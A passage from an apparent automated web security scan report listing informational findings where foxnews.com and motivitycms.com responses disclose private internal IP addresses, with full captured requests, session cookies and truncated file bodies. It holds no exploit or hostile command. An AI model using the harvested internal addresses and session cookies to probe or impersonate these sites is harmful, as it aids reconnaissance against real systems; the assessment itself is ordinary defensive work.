Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 06 Apr 2011 20:15:05 GMT
ETag: "3d2c001-7641-a5ff4440"
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 24h
Content-Type: application/x-javascript
Cache-Control: max-age=19214
Expires: Mon, 11 Apr 2011 21:41:18 GMT
Date: Mon, 11 Apr 2011 16:21:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 30273

/***** Header Script *****//*
Updated: 1/31/2011
Header script functions

To search for a specific prototype, search the keyword:
- Authentication: fn.authentication
- Weather Section: fn.weather
- O
...[SNIP]...
+_cbStr+'" type="text/javascript"%3E%3C/script%3E'));
}

// Constants
var CONST = {
   feed: {
       whatsHotLive: {
           feedFunction: "FeedSource_WhatsHotWatchLive", // feed's set function
           //url: "http://10.2.100.22:86/js/whatshot.js", // point to production
           url: "http://www.foxnews.com/js/whatshot.js",
           show: { // items to show. set to false to show however many
               hot: false,
               live: 2
           },
           rotate:
...[SNIP]...
14.135. http://www.foxnews.com/static/fn2/ws/politics/js/simple_include/elections/elections.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxnews.com
Path:   /static/fn2/ws/politics/js/simple_include/elections/elections.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static/fn2/ws/politics/js/simple_include/elections/elections.js HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: surround=undefined; rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540668835%3B%20omtr_lv%3D1302538868837%7C1397146868837%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540668837%3B%20s_nr%3D1302538868843%7C1305130868843%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dfnc%253Aroot%253Aroot%253Achannel%255E%255EPolitics%255E%255Efnc%253Aroot%253Aroot%253Achannel%2520%257C%2520Politics%255E%255E%3B%20s_sq%3Dfoxnews%253D%252526pid%25253Dfnc%2525253Aroot%2525253Aroot%2525253Achannel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.foxnews.com/politics/index.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 06 Apr 2011 20:15:24 GMT
ETag: "1d346b4-205b-a7212f00"
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 24h
Content-Type: application/x-javascript
Cache-Control: max-age=19624
Expires: Mon, 11 Apr 2011 21:48:17 GMT
Date: Mon, 11 Apr 2011 16:21:13 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 8283

/***** Elections Script *****//*
Updated: 12/01/2010
Elections 2010 Script

Available types to call:
1. tracker
2. map
3. followFox
4. listPage

************************/
(function($){
   
/***** Gener
...[SNIP]...
e;
}

// Constant variables
var CONST_config = {
   baseUrl: document.location.protocol + "\/\/" + document.location.hostname + "/static/fn2/ws/politics/js/simple_include/elections"
   // baseUrl: "http://10.232.62.153/~mabesa/fn/politics/elections/js",
};

CONST_config.asset = {
   tracker: {
       url: CONST_config.baseUrl + "/elections-tracker.js",
       callback: "FN_Elections_tracker"
   },
   map: {
       url: CONST_config.base
...[SNIP]...
14.136. http://www.motivitycms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/x-icon
ETag: "3cc48d7eb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:02:17 GMT
X-Powered-By: ASP.NET
Content-Length: 1150
Date: Sat, 09 Apr 2011 00:19:00 GMT
X-Varnish: 1413217009 1413199402
Age: 31
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: HIT

............ .h.......(....... ..... .........................QI<.H?2.H?2.H?2.I@2.I@2.I@2.H?2.H?2.H?2.H?2.I@2.H?2.H?2.H?2.QI<.H?2.=4&.=4&.>5'.?6(.@7).>5'.=4&.=4'.?6(.?6(.>5(.=4&.=4&.?6(.H@2.ME7.MC4.PE
...[SNIP]...
14.137. http://www.motivitycms.com/images/150w.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/150w.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/150w.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "a65b269eb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:10 GMT
X-Powered-By: ASP.NET
Content-Length: 11223
Date: Sat, 09 Apr 2011 00:18:21 GMT
X-Varnish: 1413195622
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a..G....2BL...............R\e...Jbq...K]j...=Q]CYd*39CR[BUb.........|..CLU:NZL[d,CI...4IU...4<A3EQEatJ^s.........L`m.........=TaRW\...gsz...+:A...t|.......dms...JTZ.....................Qbljz....d
...[SNIP]...
14.138. http://www.motivitycms.com/images/ae-before-after.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/ae-before-after.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/ae-before-after.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "d453289eb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:10 GMT
X-Powered-By: ASP.NET
Content-Length: 23722
Date: Sat, 09 Apr 2011 00:18:22 GMT
X-Varnish: 1413196423
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89at.........Fe{.......\.n..jo...M..._N'Rr......ni........q.........&....Iv......2....3H)MT.......................S......t.RW0.....Q,........p............}.3........7.............q[.........v....|.
...[SNIP]...
14.139. http://www.motivitycms.com/images/arrow-bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/arrow-bullet.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/arrow-bullet.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "9ee6259eb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:10 GMT
X-Powered-By: ASP.NET
Content-Length: 173
Date: Sat, 09 Apr 2011 00:18:25 GMT
X-Varnish: 1413197616
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a..    ....................................................................................................!.......,......    ...*. I.3..3B&.J,.....cq6....FO.aL..."q:(...)..;
14.140. http://www.motivitycms.com/images/blue-gradient.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/blue-gradient.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/blue-gradient.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "1e32a9eb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:10 GMT
X-Powered-By: ASP.NET
Content-Length: 908
Date: Sat, 09 Apr 2011 00:18:25 GMT
X-Varnish: 1413197727
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a.{....>^u4HU5KZ>_v1BM3GT?ay8Rd3FR:Vi8Qb;Wk2EQ:Uh;Ym5L[2DO;Xm<Zp=]s=\r3GS3FS7O_@c{@b{6N]@bz=]t?`w?ax?`x1BN<Yn8Rc7P`9Tg7Pa6M\>`w4HV5JX2ER6L\;Xl<[p=]rAd~9Se7N_>^t:Ug7O`2CO4IW<Zn9Sf5KY5JY?bz6N^4IX<
...[SNIP]...
14.141. http://www.motivitycms.com/images/bookmark-icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/bookmark-icon.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/bookmark-icon.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "46c62a9eb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:10 GMT
X-Powered-By: ASP.NET
Content-Length: 583
Date: Sat, 09 Apr 2011 00:18:26 GMT
X-Varnish: 1413198129
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a............O..]..\........l.....`.....O.....z..x..~..f...........a..............U..P..y..b..R..9..............z.....w..j..j..U.....[..h........Q..".."..*..f........^.....j..r..z.....n....._..(.
...[SNIP]...
14.142. http://www.motivitycms.com/images/bottom-footer-bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/bottom-footer-bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/bottom-footer-bg.jpg HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "2cbeecec18cecb1:0"
Last-Modified: Wed, 16 Feb 2011 20:34:35 GMT
X-Powered-By: ASP.NET
Content-Length: 9276
Date: Sat, 09 Apr 2011 00:18:26 GMT
X-Varnish: 1413198227
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................C....
...[SNIP]...
14.143. http://www.motivitycms.com/images/bullet-blue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/bullet-blue.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/bullet-blue.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "0a57d9eb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:10 GMT
X-Powered-By: ASP.NET
Content-Length: 261
Date: Sat, 09 Apr 2011 00:18:25 GMT
X-Varnish: 1413197728
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a.......Z...........O........N...........Z..P.......................Y..X...................................L.......................................................................................
...[SNIP]...
14.144. http://www.motivitycms.com/images/careers-footer-nav.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/careers-footer-nav.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/careers-footer-nav.jpg HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "eaca869eb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:10 GMT
X-Powered-By: ASP.NET
Content-Length: 5008
Date: Sat, 09 Apr 2011 00:18:27 GMT
X-Varnish: 1413198835
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................n.d..
...[SNIP]...
14.145. http://www.motivitycms.com/images/commerceEnabled.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/commerceEnabled.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/commerceEnabled.png HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/motivity-customers.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.2.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "5683d59eb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:11 GMT
X-Powered-By: ASP.NET
Content-Length: 4850
Date: Sat, 09 Apr 2011 00:21:45 GMT
X-Varnish: 1413307795
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

.PNG
.
...IHDR...@...>......A.o....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[y..U.?.~.=..........L2.d.$...h.f.D#TQ."j.....K......^.....j.....W..\)Q)...,..%.    .%.L2....r.....&..IS.
...[SNIP]...
14.146. http://www.motivitycms.com/images/contact-footer-nav.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/contact-footer-nav.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/contact-footer-nav.jpg HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "a696d69eb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:11 GMT
X-Powered-By: ASP.NET
Content-Length: 4511
Date: Sat, 09 Apr 2011 00:18:27 GMT
X-Varnish: 1413198769
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................n.X..
...[SNIP]...
14.147. http://www.motivitycms.com/images/customerBrocade.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/customerBrocade.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/customerBrocade.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/motivity-customers.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.2.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "301509fb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:11 GMT
X-Powered-By: ASP.NET
Content-Length: 2943
Date: Sat, 09 Apr 2011 00:21:45 GMT
X-Varnish: 1413307799
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a.......YYY.......sr"""...~~~......(((......


.........&&&..........**..................jjj.........PPP...222.!!............;;;.......33FFFwww....]].........SSS.......DD...666BBB...VVV===.mm....
...[SNIP]...
14.148. http://www.motivitycms.com/images/customerSysco.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/customerSysco.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/customerSysco.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/motivity-customers.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.2.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "caca649fb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:12 GMT
X-Powered-By: ASP.NET
Content-Length: 3186
Date: Sat, 09 Apr 2011 00:21:45 GMT
X-Varnish: 1413307796
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a.............J..M..b........%.....e.................>.......................h..?.......s.........).....v..............^..........|..... ....................}.T............t.......}2..R....h....
...[SNIP]...
14.149. http://www.motivitycms.com/images/email-icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/email-icon.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/email-icon.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "e0e9a79fb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:12 GMT
X-Powered-By: ASP.NET
Content-Length: 1026
Date: Sat, 09 Apr 2011 00:18:26 GMT
X-Varnish: 1413198192
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a...................`}....P...................................N.....Q.....<s....E........P.....^..............O.....Q...........\.....>m.........................J.....=p....Q.................\...
...[SNIP]...
14.150. http://www.motivitycms.com/images/footer-bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/footer-bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/footer-bg.jpg HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
